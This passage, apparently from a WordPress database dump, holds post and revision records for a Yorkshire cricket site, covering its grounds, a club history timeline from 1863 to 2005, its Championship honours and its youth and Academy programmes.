Wakefield, Dewsbury, York, Halifax, Huddersfield, Hull, Barnsley and Middlesbrough.</strong>','Cricket Grounds','','publish','open','open','','cricket-grounds','','','2016-12-16 14:57:44','2016-12-16 14:57:44','',0,'https://yorkshirecricketboard.org.uk/?p=10',0,'post','',0),(11,1,'2016-12-16 14:57:13','2016-12-16 14:57:13','','cricket-grounds','','inherit','open','closed','','cricket-grounds','','','2016-12-16 14:57:13','2016-12-16 14:57:13','',10,'https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-grounds.jpg',0,'attachment','image/jpeg',0),(12,1,'2016-12-16 14:57:44','2016-12-16 14:57:44','<strong>HEADINGLEY, Leeds</strong>\r\n\r\nFirst game 1891 and the County Headquarters since 1893.\r\nHeadingley has played host to Test matches since 1899.\r\n\r\n<strong>BRAMALL LANE, Sheffield</strong>\r\n\r\nFirst game 1863. Last game 1973.\r\nYorkshire\'s first home ground when the Club was founded in 1863 and a prominent venue until 1973, when it became the site for a new stand built by neighbouring Sheffield United FC.\r\nBramall Lane hosted a Test match in 1902.\r\n\r\n<strong>PARK AVENUE, Bradford</strong>\r\n\r\nFirst game 1881.\r\nThe first home of Yorkshire Academy of Cricket. It was one of the County\'s main grounds until in 1985 the pavilion was declared unsafe and had to be demolished. It was, however, given a First Class match in 1992.\r\nPark Avenue was the favourite ground of many players, including Sir Leonard Hutton.\r\n\r\n<strong>HARROGATE</strong>\r\n\r\nFirst game 1894.\r\nA favoured ground. Four Championships have been won there.\r\n\r\n<strong>SCARBOROUGH</strong>\r\n\r\nFirst game 1878.\r\nAlong with Harrogate, this is extremely popular as a festival ground. Each hosted a cricket festival every season - Harrogate early in the season, Scarborough towards the end.\r\n\r\n<strong>Yorkshire also have played matches at Abbeydale, Darnall and Hyde Park all Sheffield), Holbeck and Hunslet (Leeds), Wakefield, Dewsbury, York, Halifax, Huddersfield, Hull, Barnsley and Middlesbrough.</strong>','Cricket Grounds','','inherit','closed','closed','','10-revision-v1','','','2016-12-16 14:57:44','2016-12-16 14:57:44','',10,'https://yorkshirecricketboard.org.uk/10-revision-v1',0,'revision','',0),(13,1,'2016-12-16 15:00:02','2016-12-16 15:00:02','<em>1863</em>\r\n\r\nThe Yorkshire County Cricket Club was founded on January 8 at the\r\nAdelphi Hotel, Sheffield. The first official county match was played at The Oval on June 5 and 6 against Surrey, ending in a draw.\r\nCaptain was Roger Iddison.\r\n<em>1865</em>\r\n\r\n<strong>A players\' strike:</strong> George Anderson, George Atkinson, Roger Iddison, Joe Rowbotham and Ned Stephenson refused to play\r\nagainst Surrey after a dispute over the action of a Kent bowler, their colleague in an all-England match against Surrey.\r\nAnderson never played again for Yorkshire.\r\n\r\n<em>1867</em>\r\n\r\nYorkshire won all of their seven matches and their first, unofficial, County Championship.\r\n\r\n<em>1883</em>\r\n\r\n<strong>Lord Hawke was appointed Captain.</strong> He brought much-needed authority and discipline to the side.\r\nLord Hawke was one of the great influences on the development of the cricket. He was captain for 28 years, later becoming Yorkshire President and President of MCC.\r\n<em>1891</em>\r\n\r\nYorkshire played their first game at Headingley, now the County\r\nheadquarters and one of the major Test grounds in England.\r\n\r\n<em>1893</em>\r\n\r\nA major reorganization of the Club. Sheffield\'s hegemony shifted to Leeds.\r\n\r\n<em>1896</em>\r\n\r\nYorkshire amassed the highest score in county cricket - 887 against Warwickshire at Birmingham.\r\n\r\n<em>1900-1902</em>\r\n\r\nYorkshire lost only two Championship matches of 80 played.\r\n\r\n<em>1908</em>\r\n\r\nYorkshire went through the season unbeaten.\r\nThey bowled Northamptonshire out for the lowest aggregate score in\r\nEnglish cricket of 42 (27 and 15).\r\n<em>1910</em>\r\n\r\nLord Hawke resigned as Captain.\r\n\r\n<em>1919</em>\r\n\r\nYorkshire won the first post-war Championship with debuts from Herbert Sutcliffe, Norman Kilner, Abe Waddington and Emmott Robinson.\r\n\r\n<em>1930</em>\r\n\r\n<strong>Rhodes retired in his 53rd year.</strong> He took 73 wickets and scored 478 runs in his final season.\r\nJM Kiburn wrote in the <em>Yorkshire Post</em>: \"He had bowled at Grace, and he bowled at Bradman. At 20, at 30, at 40 and at 50 he had shown himself master of his world, and his kingdom was never usurped.\"\r\n\r\n<em>1932</em>\r\n\r\nHolmes and Sutcliffe put on a record opening stand of 555 against Essex at Leyton.\r\n\r\n<em>1938</em>\r\n\r\nLen Hutton recorded the highest individual score for England - 364 against Australia at The Oval. He was only 22.\r\n\r\n<em>1946</em>\r\n\r\nYorkshire won the first post-war Championship with debuts for Alec Coxon, Vic Wilson, Ted Lester, Gerald Smithson and Johnny wardle.\r\n\r\n<em>1951</em>\r\n\r\nBob Appleyard became the first bowler to take 200 wickets in his first full season.\r\n\r\n<em>1958</em>\r\n\r\nYorkshire sacked Johnny Wardle, then the world\'s best bowler of his type, because of \"his general behaviour\". Ronnie Burnet, the Second X1 captain, who was then 39, was elected first-team captain and won the Championship in 1959.\r\n\r\n<em>1963</em>\r\n\r\nBrian Close was made Captain, and won the Championship in his first\r\nseason.\r\n\r\n<em>1970</em>\r\n\r\nBrian Close, skipper through the highly successful 1960s, was sacked as Captain. There were the first signs of the long-running unrest in the Club.\r\n\r\n<em>1973</em>\r\n\r\nBramall Lane, Yorkshire\'s first County ground, was closed.\r\n\r\n<em>1982</em>\r\n\r\nRay Illingworth, as team manager, replaced Chris Old, the Captain, at the age of 50.\r\n\r\n<em>1983</em>\r\n\r\nYorkshire finished bottom of the 17-strong County Championship for the first time - but won the John Player later National) League) for the first time.\r\nGeoffrey Boycott, one of Yorkshire\'s most successful players, was not offered a new contract. There was a public outcry, the General Committee resigned, and Boycott eventually was reinstalled as a player - having already been elected to the Committee.\r\nBrian Close became Chairman of the Cricket Committee.\r\n\r\n<em>1984-1985</em>\r\n\r\nTeam Manager Ray Illingworth was removed from his post, and Boycott was made Vice-Captain.\r\n\r\n<em>1987</em>\r\n\r\nYorkshire, under new Captain Phil Carrick, led the Championship table in mid-summer, and won the Benson and Hedges Cup.\r\n\r\n<em>1989</em>\r\n\r\nCarrick resigned with a letter to the Committee urging the recruitment of an overseas professional.\r\n\r\n<em>1997</em>\r\n\r\nPlay for the first team was limited to Scarborough and Headingley. A majority of members supported a plan to build a new ground near Wakefield.\r\n\r\n<em>2001</em>\r\n\r\n<strong>Yorkshire won their first Championship since 1968.</strong> Captain David Byas retired - then joined Lancashire for one season.\r\n\r\n<em>2002</em>\r\n\r\nYorkshire relegated from Division 1 of the County Championship, but won the Cheltenham and Gloucester Trophy.\r\nFinancial crisis forced extraordinary general meeting, at which General Committee was replaced by a Board of Management.\r\n\r\n<em>2005</em>\r\n\r\nLed by Craig White, the Club regained promotion to Division I of the County Championship.\r\nIn December Yorkshire completed the purchase of Headingley Cricket Ground from Leeds CF&amp;A, thus owning their own premises for the first time in 142 years.\r\nColin Graves, Chief Executive for three years and chairman of the Club\'s leading sponsor, Costcutter, was replaced as Chief Executive by Stewart Regan, but retained his place on the Board.','The Clubs History','','publish','open','open','','the-clubs-history','','','2016-12-16 15:00:02','2016-12-16 15:00:02','',0,'https://yorkshirecricketboard.org.uk/?p=13',0,'post','',0),(14,1,'2016-12-16 14:59:53','2016-12-16 14:59:53','','kids-cricket','','inherit','open','closed','','kids-cricket','','','2016-12-16 14:59:53','2016-12-16 14:59:53','',13,'https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket.jpg',0,'attachment','image/jpeg',0),(15,1,'2016-12-16 15:00:02','2016-12-16 15:00:02','<em>1863</em>\r\n\r\nThe Yorkshire County Cricket Club was founded on January 8 at the\r\nAdelphi Hotel, Sheffield. The first official county match was played at The Oval on June 5 and 6 against Surrey, ending in a draw.\r\nCaptain was Roger Iddison.\r\n<em>1865</em>\r\n\r\n<strong>A players\' strike:</strong> George Anderson, George Atkinson, Roger Iddison, Joe Rowbotham and Ned Stephenson refused to play\r\nagainst Surrey after a dispute over the action of a Kent bowler, their colleague in an all-England match against Surrey.\r\nAnderson never played again for Yorkshire.\r\n\r\n<em>1867</em>\r\n\r\nYorkshire won all of their seven matches and their first, unofficial, County Championship.\r\n\r\n<em>1883</em>\r\n\r\n<strong>Lord Hawke was appointed Captain.</strong> He brought much-needed authority and discipline to the side.\r\nLord Hawke was one of the great influences on the development of the cricket. He was captain for 28 years, later becoming Yorkshire President and President of MCC.\r\n<em>1891</em>\r\n\r\nYorkshire played their first game at Headingley, now the County\r\nheadquarters and one of the major Test grounds in England.\r\n\r\n<em>1893</em>\r\n\r\nA major reorganization of the Club. Sheffield\'s hegemony shifted to Leeds.\r\n\r\n<em>1896</em>\r\n\r\nYorkshire amassed the highest score in county cricket - 887 against Warwickshire at Birmingham.\r\n\r\n<em>1900-1902</em>\r\n\r\nYorkshire lost only two Championship matches of 80 played.\r\n\r\n<em>1908</em>\r\n\r\nYorkshire went through the season unbeaten.\r\nThey bowled Northamptonshire out for the lowest aggregate score in\r\nEnglish cricket of 42 (27 and 15).\r\n<em>1910</em>\r\n\r\nLord Hawke resigned as Captain.\r\n\r\n<em>1919</em>\r\n\r\nYorkshire won the first post-war Championship with debuts from Herbert Sutcliffe, Norman Kilner, Abe Waddington and Emmott Robinson.\r\n\r\n<em>1930</em>\r\n\r\n<strong>Rhodes retired in his 53rd year.</strong> He took 73 wickets and scored 478 runs in his final season.\r\nJM Kiburn wrote in the <em>Yorkshire Post</em>: \"He had bowled at Grace, and he bowled at Bradman. At 20, at 30, at 40 and at 50 he had shown himself master of his world, and his kingdom was never usurped.\"\r\n\r\n<em>1932</em>\r\n\r\nHolmes and Sutcliffe put on a record opening stand of 555 against Essex at Leyton.\r\n\r\n<em>1938</em>\r\n\r\nLen Hutton recorded the highest individual score for England - 364 against Australia at The Oval. He was only 22.\r\n\r\n<em>1946</em>\r\n\r\nYorkshire won the first post-war Championship with debuts for Alec Coxon, Vic Wilson, Ted Lester, Gerald Smithson and Johnny wardle.\r\n\r\n<em>1951</em>\r\n\r\nBob Appleyard became the first bowler to take 200 wickets in his first full season.\r\n\r\n<em>1958</em>\r\n\r\nYorkshire sacked Johnny Wardle, then the world\'s best bowler of his type, because of \"his general behaviour\". Ronnie Burnet, the Second X1 captain, who was then 39, was elected first-team captain and won the Championship in 1959.\r\n\r\n<em>1963</em>\r\n\r\nBrian Close was made Captain, and won the Championship in his first\r\nseason.\r\n\r\n<em>1970</em>\r\n\r\nBrian Close, skipper through the highly successful 1960s, was sacked as Captain. There were the first signs of the long-running unrest in the Club.\r\n\r\n<em>1973</em>\r\n\r\nBramall Lane, Yorkshire\'s first County ground, was closed.\r\n\r\n<em>1982</em>\r\n\r\nRay Illingworth, as team manager, replaced Chris Old, the Captain, at the age of 50.\r\n\r\n<em>1983</em>\r\n\r\nYorkshire finished bottom of the 17-strong County Championship for the first time - but won the John Player later National) League) for the first time.\r\nGeoffrey Boycott, one of Yorkshire\'s most successful players, was not offered a new contract. There was a public outcry, the General Committee resigned, and Boycott eventually was reinstalled as a player - having already been elected to the Committee.\r\nBrian Close became Chairman of the Cricket Committee.\r\n\r\n<em>1984-1985</em>\r\n\r\nTeam Manager Ray Illingworth was removed from his post, and Boycott was made Vice-Captain.\r\n\r\n<em>1987</em>\r\n\r\nYorkshire, under new Captain Phil Carrick, led the Championship table in mid-summer, and won the Benson and Hedges Cup.\r\n\r\n<em>1989</em>\r\n\r\nCarrick resigned with a letter to the Committee urging the recruitment of an overseas professional.\r\n\r\n<em>1997</em>\r\n\r\nPlay for the first team was limited to Scarborough and Headingley. A majority of members supported a plan to build a new ground near Wakefield.\r\n\r\n<em>2001</em>\r\n\r\n<strong>Yorkshire won their first Championship since 1968.</strong> Captain David Byas retired - then joined Lancashire for one season.\r\n\r\n<em>2002</em>\r\n\r\nYorkshire relegated from Division 1 of the County Championship, but won the Cheltenham and Gloucester Trophy.\r\nFinancial crisis forced extraordinary general meeting, at which General Committee was replaced by a Board of Management.\r\n\r\n<em>2005</em>\r\n\r\nLed by Craig White, the Club regained promotion to Division I of the County Championship.\r\nIn December Yorkshire completed the purchase of Headingley Cricket Ground from Leeds CF&amp;A, thus owning their own premises for the first time in 142 years.\r\nColin Graves, Chief Executive for three years and chairman of the Club\'s leading sponsor, Costcutter, was replaced as Chief Executive by Stewart Regan, but retained his place on the Board.','The Clubs History','','inherit','closed','closed','','13-revision-v1','','','2016-12-16 15:00:02','2016-12-16 15:00:02','',13,'https://yorkshirecricketboard.org.uk/13-revision-v1',0,'revision','',0),(16,1,'2016-12-16 15:01:56','2016-12-16 15:01:56','<strong>Championships</strong>\r\n\r\n1867, 1869 (equal) 1870, 1893,1896, 1898, 1901, 1902, 1905, 1908, 1912, 1919, 1922, 1923, 1924, 1925, 1931, 1932, 1933, 1935, 1937, 1938, 1939, 1946, 1949(Equal), 1959, 1960, 1962, 1963, 1966, 1967, 1968 and 2001.\r\n\r\n<em>Yorkshire\'s 33 County Championships have come mostly during four decades:</em>\r\n\r\n<strong>THE 1900s</strong>\r\n\r\nYorkshire won the title four times. The side, led by Hawke, included great players such as George Hirst, David Denton - who scored 2,000 runs in a season four times - and Wilfred Rhodes - who took 3,598 wickets for the County.\r\nYorkshire were also Championship runners-up four times - in 1904, 1906, 1907 and 1909, and they were third in 1903.\r\n\r\n<strong>THE 1920s</strong>\r\n\r\nThe Championship was won four times during this decade also. The great players in this side were the openers - Herbert Sutcliffe and Percy Holmes, who still hold the record for the highest opening stand of 555 against Essex.\r\nLeft-arm spinner Wilfred Rhodes was still playing, as was George Macaulay, who took 100 Championship wickets in a season 10 times.\r\n\r\n<strong>THE 1930s</strong>\r\n\r\nMany of the side from the 1920s helped Yorkshire to their most successful era, in which they were Champions seven times - missing out only in: 1930(3rd) 1934(5th) and 1936(3rd).\r\nAlong with Sutcliffe and Rhodes from the 1920s, other players were dominant during the 1930s: Hedley Verity, another great left-arm spinner; Bill Bowes, an international opening bowler, and Len Hutton, one of the greatest batsmen ever to play cricket.\r\n\r\n<strong>THE 1960s</strong>\r\n\r\nYorkshire won the Championship six times - twice under the leadership of Vic Wilson and four (from 1963) under Brian Close. That team included England fast bowler Fred Trueman, who took 307 Test wickets; all-rounder Ray Illingworth, who captained England in 31 Test, and opening batsmen Geoff Boycott.','Championship Honours','','publish','open','open','','championship-honours','','','2016-12-16 15:01:56','2016-12-16 15:01:56','',0,'https://yorkshirecricketboard.org.uk/?p=16',0,'post','',0),(17,1,'2016-12-16 15:01:50','2016-12-16 15:01:50','','cricket-honours','','inherit','open','closed','','cricket-honours','','','2016-12-16 15:01:50','2016-12-16 15:01:50','',16,'https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-honours.jpg',0,'attachment','image/jpeg',0),(18,1,'2016-12-16 15:01:56','2016-12-16 15:01:56','<strong>Championships</strong>\r\n\r\n1867, 1869 (equal) 1870, 1893,1896, 1898, 1901, 1902, 1905, 1908, 1912, 1919, 1922, 1923, 1924, 1925, 1931, 1932, 1933, 1935, 1937, 1938, 1939, 1946, 1949(Equal), 1959, 1960, 1962, 1963, 1966, 1967, 1968 and 2001.\r\n\r\n<em>Yorkshire\'s 33 County Championships have come mostly during four decades:</em>\r\n\r\n<strong>THE 1900s</strong>\r\n\r\nYorkshire won the title four times. The side, led by Hawke, included great players such as George Hirst, David Denton - who scored 2,000 runs in a season four times - and Wilfred Rhodes - who took 3,598 wickets for the County.\r\nYorkshire were also Championship runners-up four times - in 1904, 1906, 1907 and 1909, and they were third in 1903.\r\n\r\n<strong>THE 1920s</strong>\r\n\r\nThe Championship was won four times during this decade also. The great players in this side were the openers - Herbert Sutcliffe and Percy Holmes, who still hold the record for the highest opening stand of 555 against Essex.\r\nLeft-arm spinner Wilfred Rhodes was still playing, as was George Macaulay, who took 100 Championship wickets in a season 10 times.\r\n\r\n<strong>THE 1930s</strong>\r\n\r\nMany of the side from the 1920s helped Yorkshire to their most successful era, in which they were Champions seven times - missing out only in: 1930(3rd) 1934(5th) and 1936(3rd).\r\nAlong with Sutcliffe and Rhodes from the 1920s, other players were dominant during the 1930s: Hedley Verity, another great left-arm spinner; Bill Bowes, an international opening bowler, and Len Hutton, one of the greatest batsmen ever to play cricket.\r\n\r\n<strong>THE 1960s</strong>\r\n\r\nYorkshire won the Championship six times - twice under the leadership of Vic Wilson and four (from 1963) under Brian Close. That team included England fast bowler Fred Trueman, who took 307 Test wickets; all-rounder Ray Illingworth, who captained England in 31 Test, and opening batsmen Geoff Boycott.','Championship Honours','','inherit','closed','closed','','16-revision-v1','','','2016-12-16 15:01:56','2016-12-16 15:01:56','',16,'https://yorkshirecricketboard.org.uk/16-revision-v1',0,'revision','',0),(19,1,'2016-12-16 15:02:03','2016-12-16 15:02:03','<strong>Championships</strong>\n\n1867, 1869 (equal) 1870, 1893,1896, 1898, 1901, 1902, 1905, 1908, 1912, 1919, 1922, 1923, 1924, 1925, 1931, 1932, 1933, 1935, 1937, 1938, 1939, 1946, 1949(Equal), 1959, 1960, 1962, 1963, 1966, 1967, 1968 and 2001.\n\n<em>Yorkshire\'s 33 County Championships have come mostly during four decades:</em>\n\n<strong>THE 1900s</strong>\n\nYorkshire won the title four times. The side, led by Hawke, included great players such as George Hirst, David Denton - who scored 2,000 runs in a season four times - and Wilfred Rhodes - who took 3,598 wickets for the County.\nYorkshire were also Championship runners-up four times - in 1904, 1906, 1907 and 1909, and they were third in 1903.\n\n<strong>THE 1920s</strong>\n\nThe Championship was won four times during this decade also. The great players in this side were the openers - Herbert Sutcliffe and Percy Holmes, who still hold the record for the highest opening stand of 555 against Essex.\nLeft-arm spinner Wilfred Rhodes was still playing, as was George Macaulay, who took 100 Championship wickets in a season 10 times.\n\n<strong>THE 1930s</strong>\n\nMany of the side from the 1920s helped Yorkshire to their most successful era, in which they were Champions seven times - missing out only in: 1930(3rd) 1934(5th) and 1936(3rd).\nAlong with Sutcliffe and Rhodes from the 1920s, other players were dominant during the 1930s: Hedley Verity, another great left-arm spinner; Bill Bowes, an international opening bowler, and Len Hutton, one of the greatest batsmen ever to play cricket.\n\n<strong>THE 1960s</strong>\n\nYorkshire won the Championship six times - twice under the leadership of Vic Wilson and four (from 1963) under Brian Close. That team included England fast bowler Fred Trueman, who took 307 Test wickets; all-rounder Ray Illingworth, who captained England in 31 Test, and opening batsmen Geoff Boycott.','Championship Honours','','inherit','closed','closed','','16-autosave-v1','','','2016-12-16 15:02:03','2016-12-16 15:02:03','',16,'https://yorkshirecricketboard.org.uk/16-autosave-v1',0,'revision','',0),(20,1,'2016-12-16 15:18:17','2016-12-16 15:18:17','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\n\r\nWe have also decided to sell our own branded merchandise, a fantastic idea that was producded by an associated supporter.\r\n\r\nThe funds from this will go towards helping to fund <a href=\"https://yorkshireccc.com/teams/category/first-xi-capped\" target=\"_blank\">Yorkshire’s Cricketer team</a> as much as we can. Our list consists of scarves, hats, and even drinks labels that are sold at the club.\r\n\r\nWe have worked with Wrappz to try and find the best label for the Yorkshire team, and it will be available for you in the early months of 2017. <a href=\"http://www.wrappz.com/cat/personalised-bottle-labels-wine-beer\" target=\"_blank\">Find out more</a>.\r\n\r\n<strong>Yorkshire has supported moves to extend the interest in cricket.</strong>\r\n<h2><strong>Youth Cricket</strong></h2>\r\nThere is a wider choice in sport and leisure opportunities than in the days of <a href=\"http://www.espncricinfo.com/england/content/player/14101.html\" target=\"_blank\">Lord Hawke</a>.\r\n\r\nWith the advent of summer rugby, with football overlapping summer, computer games, satellite TV and newer school sports such as badminton, squash, golf, athletics and swimming all competing for spare time, cricket is not the automatic choice.\r\n\r\n<a href=\"https://yorkshireccc.com/cricketcentre\" target=\"_blank\">Yorkshire Cricket Centre</a> at Headingley is generally fully utilized for evening practices in addition to young people attending cricket courses.\r\n<h3><strong>Schools</strong></h3>\r\nMany state schools now cannot afford or find the staff for cricket. Yorkshire Schools Cricket Association runs sides from Under-11 up to Under-15 - which are generally regarded as some of the best school sides in the country.\r\n<h3><strong>Clubs</strong></h3>\r\nWith fewer and fewer schools now playing cricket, the onus is now more on the Clubs to develop young players, and most clubs in Yorkshire now run teams from Under 12-13 to Under 17-18 level.\r\n\r\nIt is to the clubs\' advantage to get more young people interested in playing as their own sides are likely to get better. Yorkshire Cricket Association runs Under-16 and Under-19 teams in inter-county competitions, and Yorkshire are usually among the leaders.\r\n<h3><strong>The Academy</strong></h3>\r\nYorkshire Cricket Academy was opened in 1988 at Park Avenue ground, Bradford, before moving to the Cricket Centre at Headingley.\r\n\r\nIt gathered Yorkshire\'s best young players together during the season to train and play matches as a team. It regularly provides players for 2nd XI games, and some such as Darren Gough and Michael Vaughan graduate to full County contracts and international representative games.','What Does The Future Hold?','','inherit','closed','closed','','1-revision-v1','','','2016-12-16 15:18:17','2016-12-16 15:18:17','',1,'https://yorkshirecricketboard.org.uk/1-revision-v1',0,'revision','',0),(21,1,'2016-12-16 15:19:24','2016-12-16 15:19:24','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\n\r\nWe have also decided to sell our own branded merchandise, a fantastic idea that was produced by an associated supporter.\r\n\r\nThe funds from this will go towards helping to fund <a href=\"https://yorkshireccc.com/teams/category/first-xi-capped\" target=\"_blank\">Yorkshire’s Cricketer team</a> as much as we can. Our list consists of scarves, hats, and even drinks labels that are sold at the club.\r\n\r\nWe have worked with Wrappz to try and find the best label for the Yorkshire team, and it will be available for you in the early months of 2017. <a href=\"http://www.wrappz.com/cat/personalised-bottle-labels-wine-beer\" target=\"_blank\">Find out more</a>.\r\n\r\n<strong>Yorkshire has supported moves to extend the interest in cricket.</strong>\r\n<h2><strong>Youth Cricket</strong></h2>\r\nThere is a wider choice in sport and leisure opportunities than in the days of <a href=\"http://www.espncricinfo.com/england/content/player/14101.html\" target=\"_blank\">Lord Hawke</a>.\r\n\r\nWith the advent of summer rugby, with football overlapping summer, computer games, satellite TV and newer school sports such as badminton, squash, golf, athletics and swimming all competing for spare time, cricket is not the automatic choice.\r\n\r\n<a href=\"https://yorkshireccc.com/cricketcentre\" target=\"_blank\">Yorkshire Cricket Centre</a> at Headingley is generally fully utilized for evening practices in addition to young people attending cricket courses.\r\n<h3><strong>Schools</strong></h3>\r\nMany state schools now cannot afford or find the staff for cricket. Yorkshire Schools Cricket Association runs sides from Under-11 up to Under-15 - which are generally regarded as some of the best school sides in the country.\r\n<h3><strong>Clubs</strong></h3>\r\nWith fewer and fewer schools now playing cricket, the onus is now more on the Clubs to develop young players, and most clubs in Yorkshire now run teams from Under 12-13 to Under 17-18 level.\r\n\r\nIt is to the clubs\' advantage to get more young people interested in playing as their own sides are likely to get better. Yorkshire Cricket Association runs Under-16 and Under-19 teams in inter-county competitions, and Yorkshire are usually among the leaders.\r\n<h3><strong>The Academy</strong></h3>\r\nYorkshire Cricket Academy was opened in 1988 at Park Avenue ground, Bradford, before moving to the Cricket Centre at Headingley.\r\n\r\nIt gathered Yorkshire\'s best young players together during the season to train and play matches as a team. It regularly provides players for 2nd XI games, and some such as Darren Gough and Michael Vaughan graduate to full County contracts and international representative games.','What Does The Future Hold?','','inherit','closed','closed','','1-revision-v1','','','2016-12-16 15:19:24','2016-12-16 15:19:24','',1,'https://yorkshirecricketboard.org.uk/1-revision-v1',0,'revision','',0),(22,1,'2016-12-16 15:21:10','2016-12-16 15:21:10','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\n\r\nWe have also decided to sell our own branded merchandise, a fantastic idea that was produced by an associated supporter.\r\n\r\nThe funds from this will go towards helping to fund <a href=\"https://yorkshireccc.com/teams/category/first-xi-capped\" target=\"_blank\">Yorkshire’s Cricketer team</a> as much as we can. Our list consists of scarves, hats, and even drinks labels that are sold at the club.\r\n\r\nWe have worked with Wrappz to try and find the best label for the Yorkshire team, and it will be available for you in the early months of 2017. <a href=\"http://www.wrappz.com/cat/personalised-bottle-labels-wine-beer\" target=\"_blank\">Find out more</a>.\r\n\r\n<strong>Yorkshire has supported moves to extend the interest in cricket.</strong>\r\n<h2><strong>Youth Cricket</strong></h2>\r\nThere is a wider choice in sport and leisure opportunities than in the days of <a href=\"http://www.espncricinfo.com/england/content/player/14101.html\" target=\"_blank\">Lord Hawke</a>.\r\n\r\nWith the advent of summer rugby, with football overlapping summer, computer games, satellite TV and newer school sports such as badminton, squash, golf, athletics and swimming all competing for spare time, cricket is not the automatic choice.\r\n\r\n<a href=\"https://yorkshireccc.com/cricketcentre\" target=\"_blank\">Yorkshire Cricket Centre</a> at Headingley is generally fully utilized for evening practices in addition to young people attending cricket courses.\r\n<h3><strong>Schools</strong></h3>\r\nMany state schools now cannot afford or find the staff for cricket. Yorkshire Schools Cricket Association runs sides from Under-11 up to Under-15 - which are generally regarded as some of the best school sides in the country.\r\n<h3><strong>Clubs</strong></h3>\r\nWith fewer and fewer schools now playing cricket, the onus is now more on the Clubs to develop young players, and most clubs in Yorkshire now run teams from Under 12-13 to Under 17-18 level.\r\n\r\nIt is to the clubs\' advantage to get more young people interested in playing as their own sides are likely to get better. Yorkshire Cricket Association runs Under-16 and Under-19 teams in inter-county competitions, and Yorkshire are usually among the leaders.\r\n<h3><strong>The Academy</strong></h3>\r\nYorkshire Cricket Academy was opened in 1988 at Park Avenue ground, Bradford, before moving to the Cricket Centre at Headingley. Watch over the last 150 years of Yorkshire\'s cricket club <a href=\"http://www.thetelegraphandargus.co.uk/tahistory/featuresnostalgiapasttimes/10149205.150_momentous_years_of_Yorkshire_County_Cricket_Club/\" target=\"_blank\">here</a>.\r\n\r\nIt gathered Yorkshire\'s best young players together during the season to train and play matches as a team. It regularly provides players for 2nd XI games, and some such as Darren Gough and Michael Vaughan graduate to full County contracts and international representative games.','What Does The Future Hold?','','inherit','closed','closed','','1-revision-v1','','','2016-12-16 15:21:10','2016-12-16 15:21:10','',1,'https://yorkshirecricketboard.org.uk/1-revision-v1',0,'revision','',0),(23,1,'2016-12-16 15:22:45','2016-12-16 15:22:45','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\n\r\nWe have also decided to sell our own branded merchandise, a fantastic idea that was produced by an associated supporter.\r\n\r\nThe funds from this will go towards helping to fund <a href=\"https://yorkshireccc.com/teams/category/first-xi-capped\" target=\"_blank\">Yorkshire’s Cricketer team</a> as much as we can. Our list consists of scarves, hats, and even drinks labels that are sold at the club.\r\n\r\nWe have worked with Wrappz to try and find the best label for the Yorkshire team, and it will be available for you in the early months of 2017. <a href=\"http://www.wrappz.com/cat/personalised-bottle-labels-wine-beer\" target=\"_blank\">Find out more</a>.\r\n\r\n<strong>Yorkshire has supported moves to extend the interest in cricket.</strong>\r\n<h2><strong>Youth Cricket</strong></h2>\r\nThere is a wider choice in sport and leisure opportunities than in the days of <a href=\"http://www.espncricinfo.com/england/content/player/14101.html\" target=\"_blank\">Lord Hawke</a>.\r\n\r\nWith the advent of summer rugby, with football overlapping summer, computer games, satellite TV and newer school sports such as badminton, squash, golf, athletics and swimming all competing for spare time, cricket is not the automatic choice.\r\n\r\n<a href=\"https://yorkshireccc.com/cricketcentre\" target=\"_blank\">Yorkshire Cricket Centre</a> at Headingley is generally fully utilized for evening practices in addition to young people attending cricket courses.\r\n<h3><strong>Schools</strong></h3>\r\nMany state schools now cannot afford or find the staff for cricket. Yorkshire Schools Cricket Association runs sides from Under-11 up to Under-15 - which are generally regarded as some of the best school sides in the country.\r\n<h3><strong>Clubs</strong></h3>\r\nWith fewer and fewer schools now playing cricket, the onus is now more on the Clubs to develop young players, and most clubs in Yorkshire now run teams from Under 12-13 to Under 17-18 level.\r\n\r\nIt is to the clubs\' advantage to get more young people interested in playing as their own sides are likely to get better. Yorkshire Cricket Association runs Under-16 and Under-19 teams in inter-county competitions, and Yorkshire are usually among the leaders.\r\n<h3><strong>The Academy</strong></h3>\r\nYorkshire Cricket Academy was opened in 1988 at Park Avenue ground, Bradford, before moving to the Cricket Centre at Headingley. Watch over the last 150 years of Yorkshire\'s cricket club <a href=\"http://www.thetelegraphandargus.co.uk/tahistory/featuresnostalgiapasttimes/10149205.150_momentous_years_of_Yorkshire_County_Cricket_Club/\" target=\"_blank\">here</a>.','What Does The Future Hold?','','inherit','closed','closed','','1-revision-v1','','','2016-12-16 15:22:45','2016-12-16 15:22:45','',1,'https://yorkshirecricketboard.org.uk/1-revision-v1',0,'revision','',0),(24,1,'2016-12-16 15:24:11','2016-12-16 15:24:11','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\n\r\nWe have also decided to sell our own branded merchandise, a fantastic idea that was produced by an associated supporter.\r\n\r\nThe funds from this will go towards helping to fund <a href=\"https://yorkshireccc.com/teams/category/first-xi-capped\" target=\"_blank\">Yorkshire’s Cricketer team</a> as much as we can. Our list consists of scarves, hats, and even drinks labels that are sold at the club.\r\n\r\nWe have worked with Wrappz to try and find the best label for the Yorkshire team, and it will be available for you in the early months of 2017. <a href=\"http://www.wrappz.com/cat/personalised-bottle-labels-wine-beer\" target=\"_blank\">Find out more</a>.\r\n\r\n<strong>Yorkshire has supported moves to extend the interest in cricket.</strong>\r\n<h2><strong>Youth Cricket</strong></h2>\r\nThere is a wider choice in sport and leisure opportunities than in the days of <a href=\"http://www.espncricinfo.com/england/content/player/14101.html\" target=\"_blank\">Lord 